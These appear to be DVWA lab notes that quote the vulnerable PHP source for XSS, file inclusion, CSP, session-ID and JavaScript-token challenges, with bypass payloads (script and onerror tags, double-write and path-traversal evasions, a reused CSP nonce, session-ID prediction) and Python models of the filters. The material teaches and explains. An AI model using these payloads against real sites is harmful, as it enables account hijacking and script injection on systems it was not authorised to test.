XSS section
DVWA lab (default login admin / password). Wherever a page interacts with user input there may be a vulnerability!
<pre>Hello <script>alert('1')</script></pre>
The script tag is what the browser executes JavaScript from: when the JS runs correctly nothing shows up in the page, the browser simply executes it.
<scr<script>ipt>alert('1')</script>   (double write: after a filter removes the inner "<script>" once, the remaining pieces re-join into a valid tag)
Hold the mouse button on me! <img src="x" onmouseup=alert(1) />
<img src="x" onclick=alert(1) />
<img src="x" onmouseover=alert(1) />
<img src="x" onmousedown=alert(1) />
<img src="x" onmouseup=alert(1) />
Reflected XSS
Stored XSS (the guestbook / message board is the classic case)
DOM-based XSS
XSS(Reflected)
Low Security Level
<?php
header ("X-XSS-Protection: 0");
// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
// Feedback for end user
echo '<pre>Hello ' . $_GET[ 'name' ] . '</pre>';
}
?>
<script>alert(1)</script>
Medium Reflected XSS Source
<?php
header ("X-XSS-Protection: 0");
// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
// Get input
$name = str_replace( '<script>', '', $_GET[ 'name' ] );
// Feedback for end user
echo "<pre>Hello ${name}</pre>";
}
?>
<ScriPt>alert(1)</sCRipt>   (str_replace is case-sensitive and runs a single pass, so mixed case or <scr<script>ipt>alert(1)</script> both get through; the browser does not care about tag-name case)
High Reflected XSS Source
<?php
header ("X-XSS-Protection: 0");
// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
// Get input
$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $_GET[ 'name' ] );
// Feedback for end user
echo "<pre>Hello ${name}</pre>";
}
?>
<img src="x" onerror="alert(1)">   (the regex only removes something shaped like "<...script"; any other tag carrying an on* event handler is left untouched)
Impossible Reflected XSS Source
<?php
// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
// Get input
$name = htmlspecialchars( $_GET[ 'name' ] );
// Feedback for end user
echo "<pre>Hello ${name}</pre>";
}
// Generate Anti-CSRF token
generateSessionToken();
?>
XSS(Stored)
Low Stored XSS Source
<?php
if( isset( $_POST[ 'btnSign' ] ) ) {
// Get input
$message = trim( $_POST[ 'mtxMessage' ] );
$name = trim( $_POST[ 'txtName' ] );
// Sanitize message input
$message = stripslashes( $message );
$message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Sanitize name input
$name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Update database
$query = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
//mysql_close();
}
?>
Name:admin
Message:<script>alert(1)</script>
Medium Stored XSS Source
<?php
if( isset( $_POST[ 'btnSign' ] ) ) {
// Get input
$message = trim( $_POST[ 'mtxMessage' ] );
$name = trim( $_POST[ 'txtName' ] );
// Sanitize message input
$message = strip_tags( addslashes( $message ) );
$message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$message = htmlspecialchars( $message );
// Sanitize name input
$name = str_replace( '<script>', '', $name );
$name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Update database
$query = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
//mysql_close();
}
?>
First raise the maxlength limit on the Name input in the front end, or edit the request in Burp. The Message field goes through strip_tags and htmlspecialchars and is safe; the Name field only has the literal "<script>" removed.
Name: <img src="x" onerror="alert(1)">
Message: admin
High Stored XSS Source
<?php
if( isset( $_POST[ 'btnSign' ] ) ) {
// Get input
$message = trim( $_POST[ 'mtxMessage' ] );
$name = trim( $_POST[ 'txtName' ] );
// Sanitize message input
$message = strip_tags( addslashes( $message ) );
$message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$message = htmlspecialchars( $message );
// Sanitize name input
$name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name );
$name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
// Update database
$query = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
//mysql_close();
}
?>
Same as Medium: raise the maxlength limit on the Name input in the front end, or edit the request in Burp. The Message field is still strip_tags + htmlspecialchars; the Name field only has the "<...script" regex applied, so an image tag with an event handler passes.
Name: <img src="x" onerror="alert(1)">
Message: admin
Impossible Stored XSS Source
<?php
if( isset( $_POST[ 'btnSign' ] ) ) {
// Check Anti-CSRF token
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
// Get input
$message = trim( $_POST[ 'mtxMessage' ] );
$name = trim( $_POST[ 'txtName' ] );
// Sanitize message input
$message = stripslashes( $message );
$message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$message = htmlspecialchars( $message );
// Sanitize name input
$name = stripslashes( $name );
$name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
$name = htmlspecialchars( $name );
// Update database
$data = $db->prepare( 'INSERT INTO guestbook ( comment, name ) VALUES ( :message, :name );' );
$data->bindParam( ':message', $message, PDO::PARAM_STR );
$data->bindParam( ':name', $name, PDO::PARAM_STR );
$data->execute();
}
// Generate Anti-CSRF token
generateSessionToken();
?>
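To see exactly which of the payloads above each DVWA level lets through, and why only the Name field stays exploitable in the Stored levels, here is an added Python model of the filter calls quoted in the Reflected and Stored sources. It is example code written for this page, not DVWA's own: strip_tags is approximated with a regex, the two SQL-escaping calls are left out because they protect the INSERT rather than the rendered page, and the "would the browser run this" check is a heuristic that is sufficient for the payloads shown on this page.

```python
import html
import re

# Added example: Python re-implementation of the per-level "name" filters from the
# DVWA sources quoted above. Reflected and the Stored "Name" field use the same calls.

def filter_low(name):
    # Low: echo '<pre>Hello ' . $_GET['name'] . '</pre>';  -- no filtering at all
    return name

def filter_medium(name):
    # Medium: str_replace('<script>', '', $name) -- case-sensitive, single pass
    return name.replace("<script>", "")

def filter_high(name):
    # High: preg_replace('/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name)
    # Removes anything shaped like "<...script" but leaves every other tag alone.
    return re.sub(r"<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t", "", name, flags=re.IGNORECASE)

def filter_impossible(name):
    # Impossible: htmlspecialchars($name). (html.escape also encodes the single quote,
    # which PHP before 8.1 does not by default; harmless here because the value is
    # rendered as element text inside <pre>, not inside an attribute.)
    return html.escape(name, quote=True)

FILTERS = {
    "low": filter_low,
    "medium": filter_medium,
    "high": filter_high,
    "impossible": filter_impossible,
}

def filter_message(message):
    # Stored Medium/High "Message" field: strip_tags(addslashes($m)) ... htmlspecialchars($m).
    # strip_tags is approximated by deleting every <...> token. addslashes and
    # mysqli_real_escape_string are omitted: they only add backslashes, which does not
    # change whether a tag survives, and the SQL escaping is consumed by the database.
    return html.escape(re.sub(r"<[^>]*>", "", message), quote=True)

def render(name):
    # echo "<pre>Hello ${name}</pre>";
    return "<pre>Hello " + name + "</pre>"

# Heuristic for "the browser would run script here": a live <script> tag, or an on*
# event-handler attribute inside some tag. Sufficient for the payloads on this page.
_EXECUTABLE = re.compile(r"<script\b|<\w+[^>]*\bon\w+\s*=", re.IGNORECASE)

def looks_executable(markup):
    return _EXECUTABLE.search(markup) is not None

def surviving_levels(payload):
    """Levels at which `payload` still reaches the browser as live markup."""
    return [level for level, f in FILTERS.items() if looks_executable(render(f(payload)))]

# Payloads taken from this page
PAYLOADS = {
    "plain":  "<script>alert(1)</script>",
    "case":   "<ScriPt>alert(1)</sCRipt>",
    "double": "<scr<script>ipt>alert('1')</script>",
    "img":    '<img src="x" onerror="alert(1)">',
}

if __name__ == "__main__":
    for label, payload in PAYLOADS.items():
        print("%-7s %-40s fires at: %s" % (label, payload, surviving_levels(payload)))
    # The Message field strips tags and HTML-encodes, so none of them fire there
    print("message field:", [looks_executable(filter_message(p)) for p in PAYLOADS.values()])
```

Running it prints, per payload, the list of levels it survives: the plain script tag only at Low, the case-mixed and double-written tags up to Medium, the img/onerror payload up to High, and nothing at Impossible or through the Message field. The pattern is the lesson: each blacklist is defeated by the one shape it did not anticipate, while output encoding (htmlspecialchars) works regardless of the payload.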
File Inclusion section
Low Security
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
?>
1. Look at the page URL: vulnerabilities/fi/?page=include.php
2. Hover over the file1.php link and watch the status bar at the bottom left: fi/?page=file1.php
3. Try a remote file: fi/?page=http://www.baidu.com (remote inclusion only works when PHP has allow_url_include enabled; otherwise only local paths can be included)
Medium Security
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
// Input validation
$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", "..\\" ), "", $file );
?>
vulnerabilities/fi/?page=hthttp://tp://www.baidu.com   // double write: str_replace makes a single pass, so once the inner "http://" is removed the remaining pieces re-join into "http://www.baidu.com"
vulnerabilities/fi/?page=..././xxx.php                 // same trick for "../": one pass turns "..././" into "../"
High Security
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
// Input validation
if( !fnmatch( "file*", $file ) && $file != "include.php" ) {
// This isn't the page we want!
echo "ERROR: File not found!";
exit;
}
?>
// The name must start with "file" (fnmatch("file*") only checks the prefix), so the file:// protocol qualifies: vulnerabilities/fi/?page=file:///c://phpstudy_pro
Impossible Security
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
// Only allow include.php or file{1..3}.php
if( $file != "include.php" && $file != "file1.php" && $file != "file2.php" && $file != "file3.php" ) {
// This isn't the page we want!
echo "ERROR: File not found!";
exit;
}
?>
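The Medium, High and Impossible checks above, re-implemented in Python so the two bypasses and the allow-list can be verified offline. This is added example code, not DVWA's; the strip_until_stable function is an added hardening variant of the Medium filter, shown only to make the single-pass problem concrete, and the test inputs are the ones from this page.

```python
import fnmatch

# Added example: the Medium/High/Impossible checks from the DVWA file-inclusion
# sources above, re-implemented in Python so the bypasses can be checked offline.

def fi_medium(page):
    # Medium: str_replace(array("http://", "https://"), "", $file);
    #         str_replace(array("../", "..\\"), "", $file);
    # Each replacement is a single pass: the output is not re-scanned.
    page = page.replace("http://", "").replace("https://", "")
    page = page.replace("../", "").replace("..\\", "")
    return page

def strip_until_stable(page):
    # Added hardening variant: repeat the Medium filter until nothing changes, so a
    # token re-assembled by one removal is removed by the next pass.
    # (Still a blacklist; the Impossible level's allow-list is the real fix.)
    while True:
        stripped = fi_medium(page)
        if stripped == page:
            return stripped
        page = stripped

def fi_high_allows(page):
    # High: if( !fnmatch("file*", $file) && $file != "include.php" ) { ... exit; }
    # fnmatch only checks the prefix, so any string starting with "file" passes,
    # including a file:// URL. fnmatchcase mirrors PHP's case-sensitive fnmatch.
    return fnmatch.fnmatchcase(page, "file*") or page == "include.php"

def fi_impossible_allows(page):
    # Impossible: exact allow-list of the four expected page names
    return page in ("include.php", "file1.php", "file2.php", "file3.php")

if __name__ == "__main__":
    for p in ("hthttp://tp://www.baidu.com", "..././xxx.php"):
        print("%-28s medium -> %-22s stable -> %s" % (p, fi_medium(p), strip_until_stable(p)))
    for p in ("file1.php", "file:///c://phpstudy_pro", "../../etc/passwd", "include.php"):
        print("%-28s high: %-5s impossible: %s" % (p, fi_high_allows(p), fi_impossible_allows(p)))
```

The first loop shows the single pass turning the double-written inputs into exactly the strings the filter meant to block; the second shows the High check accepting a file:// URL because only the prefix is tested, while the Impossible allow-list rejects everything that is not one of the four page names.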
★CSP Bypass (browser security policy)
Protects against XSS.
Content Security Policy.
The page only allows scripts from certain sites, so the trick is to get a JS file of your own hosted at one of those sites.
Pastebin.com   // a site where anyone can paste code; its raw URLs can be loaded as a script by the page
(Low level) the header allows scripts from a handful of sites to be included and executed.
So go to one of those sites, paste the malicious code there, and the page will load and execute it.
Inclusion works: this is very similar to stored XSS!
(Medium level)
unsafe-inline allows inline resources: javascript: URLs, on* handlers such as onclick, inline style
nonce-source allows one specific inline block: nonce="TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA="   // this is just a fixed sentence base64-encoded (it decodes to "Never going to give you up"); a nonce only restricts anything if it is random and fresh for every response, and this one is a constant, so anyone can copy it
<script nonce="TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA=">alert('haha')</script>   // submit this and the alert fires
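A small script-src evaluator, added here to show offline why the Low and Medium policies fall. It is not DVWA's code. The two policy strings are constructed to have the shape the notes describe (an allow-list that includes pastebin.com at Low; 'unsafe-inline' plus the fixed nonce at Medium) and are not the exact headers DVWA sends; the page origin is an assumption; host matching is simplified (no wildcards, no path matching). The one CSP rule it relies on is real: once a directive contains a nonce or hash source, browsers ignore 'unsafe-inline' in that directive.

```python
import secrets
from urllib.parse import urlsplit

# Added example: simplified script-src evaluator, not DVWA code. Policies below are
# constructed to match the shape described in the notes, not DVWA's exact headers.

PAGE_ORIGIN = "http://127.0.0.1"  # assumed origin of the DVWA page, used for 'self'
STATIC_NONCE = "TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA="  # base64("Never going to give you up")

LOW_POLICY = "script-src 'self' https://pastebin.com"
MEDIUM_POLICY = "script-src 'self' 'unsafe-inline' 'nonce-%s'" % STATIC_NONCE

def parse_csp(header):
    """Map directive name -> list of source expressions."""
    directives = {}
    for part in header.split(";"):
        tokens = part.split()
        if tokens:
            directives[tokens[0].lower()] = tokens[1:]
    return directives

def script_allowed(header, src=None, nonce=None):
    """Would a <script> with external `src`, or an inline script carrying `nonce`, run?"""
    sources = parse_csp(header).get("script-src", [])
    if src is None:                                   # inline script
        if nonce is not None and "'nonce-%s'" % nonce in sources:
            return True
        # CSP rule: once any nonce- or hash-source is present, 'unsafe-inline' is ignored
        has_nonce_or_hash = any(s.startswith(("'nonce-", "'sha256-", "'sha384-", "'sha512-"))
                                for s in sources)
        return "'unsafe-inline'" in sources and not has_nonce_or_hash
    url = urlsplit(src)                               # external script
    origin = "%s://%s" % (url.scheme, url.netloc)
    for s in sources:
        if s == "'self'" and origin == PAGE_ORIGIN:
            return True
        if s.startswith("'"):
            continue                                  # keyword, nonce or hash, not a host
        if s == origin or ("://" not in s and s == url.netloc):
            return True
    return False

def fresh_nonce():
    # The fix for the Medium level: a new unguessable nonce for every response
    return secrets.token_urlsafe(16)

def policy_with_nonce(nonce):
    return "script-src 'self' 'nonce-%s'" % nonce    # no 'unsafe-inline' needed at all

if __name__ == "__main__":
    print("Low,    script from pastebin:", script_allowed(LOW_POLICY, src="https://pastebin.com/raw/example"))
    print("Low,    inline payload      :", script_allowed(LOW_POLICY))
    print("Medium, inline, no nonce    :", script_allowed(MEDIUM_POLICY))
    print("Medium, inline, page nonce  :", script_allowed(MEDIUM_POLICY, nonce=STATIC_NONCE))
    n = fresh_nonce()
    print("Fixed,  inline, old nonce   :", script_allowed(policy_with_nonce(n), nonce=STATIC_NONCE))
```

Two things to take from the output: at Low an inline payload is blocked, yet a script served from pastebin.com runs, so an allow-list that contains a site where anyone can upload is no allow-list at all; at Medium 'unsafe-inline' buys the attacker nothing (the nonce source disables it), and the whole protection rests on the nonce being secret, which a constant never is.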
★Weak Session IDs
After login some sites hand out a session id as the user's identifier.
If you know someone else's session id and forge it, you may get into their account without going through username and password.
Change the value to 0 and you are treated as user 0 (the id is just a counter).
Browser-side bypass: edit the cookie value and reload the page.
At the next level the id is derived from the login time: unless you can find out when the user logged in you cannot forge it (and if you can narrow the time down, only a handful of guesses remain).
The stronger protection adds md5 on top:
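The three weak schemes this section describes (a counter, the login time, md5 over a counter), each written out as the attacker's prediction step, next to a properly random id. Added example, not DVWA code; that the md5 is taken over the same small counter as the first scheme is an assumption made here so the brute force can be shown.

```python
import hashlib
import secrets
import time

# Added example, not DVWA code. Models the session-id schemes described above and the
# prediction an attacker makes from one captured value. Assumption: the md5 scheme
# hashes the same small counter used by the first scheme.

def next_counter_id(captured):
    # Scheme 1: ids increment. Seeing "41" means 40, 42, ... are other users; "0" is user 0.
    return str(int(captured) + 1)

def candidate_timestamp_ids(login_time, window=5):
    # Scheme 2: id = time() at login. Knowing the login time to within `window`
    # seconds leaves only 2*window+1 candidates to try.
    return [str(login_time + d) for d in range(-window, window + 1)]

def md5_counter_id(counter):
    return hashlib.md5(str(counter).encode()).hexdigest()

def recover_counter(md5_id, limit=1_000_000):
    # Scheme 3: md5(counter). Hashing adds no secrecy: the input space is tiny, so
    # walk it until the captured id is reproduced.
    for n in range(limit):
        if md5_counter_id(n) == md5_id:
            return n
    return None

def predict_next_md5_id(md5_id):
    n = recover_counter(md5_id)
    return None if n is None else md5_counter_id(n + 1)

def secure_session_id():
    # What all three should have been: 256 bits from the OS CSPRNG. Nothing about
    # one id says anything about the next one.
    return secrets.token_hex(32)

if __name__ == "__main__":
    print("counter     :", "41 ->", next_counter_id("41"))
    now = int(time.time())
    print("timestamp   :", candidate_timestamp_ids(now, window=1))
    captured = md5_counter_id(41)
    print("md5 counter :", captured, "->", recover_counter(captured), "-> next", predict_next_md5_id(captured))
    print("random      :", secure_session_id())
```

The md5 case is the one worth internalising: a hash of a predictable value is still a predictable value, and a few hundred thousand md5 calls take well under a second.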
★JavaScript Attacks
Attacking the web front end.
Procedure:
First find out what the token algorithm is.
Read the JS that builds the token, then reproduce it.
Some sites hard-code the value in the form so the submission can never succeed as-is; the token has to be bypassed.
When you click around, besides the submit button there are hidden elements that reveal the site's token.
If the token is wrong, the result is an error even when the submitted content is right.
In the console run md5(rot13("success")) to get the token (read the source to learn the exact algorithm: rot13 first, then md5).
medium level:
XXsuccessXX
XXsseccusXX   ---> reversed, this is the final token
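The Low and Medium token algorithms from this section, recomputed in Python the way the server-side check has to work, so it is clear why a token the page generated for another phrase fails once the phrase is changed to "success". Added example, not DVWA's JavaScript; the "other phrase" used for the stale token is a constructed value.

```python
import codecs
import hashlib

# Added example, not DVWA's JavaScript: the Low and Medium token algorithms from
# this section, plus the server-side comparison that makes a stale token fail.

def rot13(s):
    return codecs.encode(s, "rot_13")

def low_token(phrase):
    # Low: token = md5(rot13(phrase)) -- what the notes compute in the console
    return hashlib.md5(rot13(phrase).encode()).hexdigest()

def medium_token(phrase):
    # Medium: token = reverse("XX" + phrase + "XX")
    return ("XX" + phrase + "XX")[::-1]

CHECKS = {"low": low_token, "medium": medium_token}

def server_accepts(level, phrase, token):
    # The server recomputes the token from the submitted phrase; the right
    # phrase with a token built for some other phrase is rejected.
    return phrase == "success" and CHECKS[level](phrase) == token

if __name__ == "__main__":
    stale = low_token("some-other-phrase")   # constructed: a token made for a different phrase
    print("low, phrase=success, stale token :", server_accepts("low", "success", stale))
    print("low, phrase=success, fresh token :", server_accepts("low", "success", low_token("success")))
    print("medium token for 'success'       :", medium_token("success"))
```

Because the token is a pure function of the phrase, anyone who can read the page's JavaScript can compute it; the only thing the mechanism stops is a user who edits the phrase without also regenerating the token.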
high
At this level the JS has been obfuscated.
Site for undoing the obfuscation: